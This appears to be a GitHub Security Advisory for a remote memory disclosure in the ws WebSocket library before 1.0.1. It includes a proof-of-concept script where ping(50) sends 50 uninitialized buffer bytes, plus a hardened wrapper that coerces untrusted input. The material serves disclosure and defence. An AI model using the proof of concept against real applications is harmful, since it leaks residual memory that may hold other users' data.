GHSA-2mhh-w6q8-5hxw

GitHub Security Advisory

Remote Memory Disclosure in ws

✓ GitHub Reviewed LOW Has CVE

Advisory Details

Versions of `ws` prior to 1.0.1 are affected by a remote memory disclosure vulnerability.

In certain rare circumstances, applications which allow users to control the arguments of a `client.ping()` call will cause `ws` to send the contents of an allocated but non-zero-filled buffer to the server. This may disclose sensitive information that still exists in memory after previous use of the memory for other tasks.

## Proof of Concept
```javascript
var ws = require('ws')

// Local server for the client to talk to; it echoes pings back as pongs.
var server = new ws.Server({ port: 9000 })
var client = new ws('ws://localhost:9000')

client.on('open', function () {
  console.log('open')
  // Passing a number instead of a string or Buffer makes ws < 1.0.1 allocate
  // a 50-byte buffer without zeroing it and send its contents as the ping payload.
  client.ping(50) // this sends a non-zeroed buffer of 50 bytes

  client.on('pong', function (data) {
    console.log('got pong')
    console.log(data) // Data from the client, echoed back by the server: the leaked bytes.
  })
})
```

## Recommendation

Update to version 1.0.1 or greater.
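As an added example (not part of the advisory or of the `ws` project's code), the snippet below models the pre-1.0.1 code path that turned a numeric `ping()` argument into an uninitialized buffer, and shows an application-side wrapper that coerces user-controlled input to an initialized string or Buffer before it reaches the library. `Buffer.allocUnsafe` stands in for the old non-zero-filled `new Buffer(n)`; the names `legacyPingFrame`, `toPingPayload` and `safePing` are hypothetical.

```javascript
'use strict';
// Added example: model of the pre-1.0.1 behaviour and a hardened wrapper.
// Names (legacyPingFrame, toPingPayload, safePing) are hypothetical; ws is not required.

// Model of what ws < 1.0.1 did when ping() received a number: it allocated a
// buffer of that length without clearing it (Buffer.allocUnsafe stands in for
// the old non-zero-filled `new Buffer(n)`) and used it as the ping payload, so
// whatever the memory pool still held was sent to the peer.
function legacyPingFrame(data) {
  if (typeof data === 'number') return Buffer.allocUnsafe(data);
  return Buffer.from(data);
}

// Hardened wrapper: strings and Buffers pass through, anything else is
// stringified, so the payload length is never chosen by an untrusted number
// and the bytes are always initialized.
const MAX_PING_PAYLOAD = 125; // control frames carry at most 125 bytes (RFC 6455)

function toPingPayload(input) {
  let payload;
  if (Buffer.isBuffer(input)) payload = input;
  else if (typeof input === 'string') payload = Buffer.from(input, 'utf8');
  else if (input === undefined || input === null) payload = Buffer.alloc(0);
  else payload = Buffer.from(String(input), 'utf8'); // e.g. 50 -> "50", not a 50-byte buffer
  if (payload.length > MAX_PING_PAYLOAD) {
    throw new RangeError('ping payload exceeds ' + MAX_PING_PAYLOAD + ' bytes');
  }
  return payload;
}

// Use safePing(client, userInput) where the application would otherwise call
// client.ping(userInput) with untrusted input. Returns the payload actually sent.
function safePing(client, userInput) {
  const payload = toPingPayload(userInput);
  client.ping(payload);
  return payload;
}
```

Updating `ws` is the fix; the wrapper only keeps untrusted numbers out of a library call whose argument type decides what gets allocated.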

Affected Packages

npm ws
Affected versions: 0 (fixed in 1.0.1)

Related CVEs

Key Information

GHSA ID
GHSA-2mhh-w6q8-5hxw
Published
February 18, 2019 11:56 PM
Last Modified
August 31, 2020 6:09 PM
CVSS Score
2.5 /10
Primary Ecosystem
npm
Primary Package
ws
GitHub Reviewed
✓ Yes

Dataset

Last updated: July 4, 2025 6:27 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.